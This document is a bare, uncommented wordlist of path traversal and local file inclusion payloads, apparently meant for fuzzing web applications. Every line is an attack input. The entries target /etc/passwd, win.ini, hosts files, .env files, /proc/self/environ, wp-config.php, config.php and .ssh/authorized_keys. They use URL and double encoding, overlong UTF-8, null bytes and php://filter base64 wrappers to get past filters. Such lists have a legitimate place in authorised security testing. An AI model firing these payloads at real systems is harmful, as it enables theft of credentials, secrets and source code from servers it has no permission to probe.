../etc/passwd
../../../../etc/passwd
../../../etc/passwd
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
..%2f..%2f..%2f..%2fetc%2fpasswd
..%5c..%5c..%5cwindows%5cwin.ini
..%5c..%5c..%5c..%5cWindows%5cwin.ini
C:\Windows\win.ini
C:\Windows\System32\drivers\etc\hosts
/etc/hosts
/var/www/html/.env
../../.env
../../../../.env
../.env
/var/log/apache2/access.log
../../../../var/log/apache2/access.log
/proc/self/environ
../../../../proc/self/environ
php://filter/convert.base64-encode/resource=../../config.php
php://filter/convert.base64-encode/resource=../../../app/config.php
php://filter/convert.base64-encode/resource=../../../../.env
..;/../..;/etc/passwd
....//....//etc/passwd
..%2f..%2f..%2f..%2fetc%2fpasswd%00
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%2f..%2f..%2fvar%2Fwww%2Fconfig.php
../../../../var/www/config.php
../../../../etc/hosts
../../../windows/win.ini
/../../../../etc/passwd
%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
..%2f..%2f..%2f..%2fetc%2fpasswd%2f.
..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
%2fetc%2fpasswd
%2f%2fetc%2fpasswd
../..\../etc/passwd
..\..\..\Windows\System32\drivers\etc\hosts
..%00/../etc/passwd
..%2500/../etc/passwd
/..%2f..%2f/etc/passwd
/var/www/html/index.php
/var/www/html/config.php
../../../../var/www/html/wp-config.php
../../../../wp-config.php
../../../../config.php
../../../../.ssh/authorized_keys
../../../.ssh/authorized_keys
../.ssh/authorized_keys
%2e%2e%2f%2etmp%2ffile
..%2f..%2f..%2f..%2ftmp%2ffile
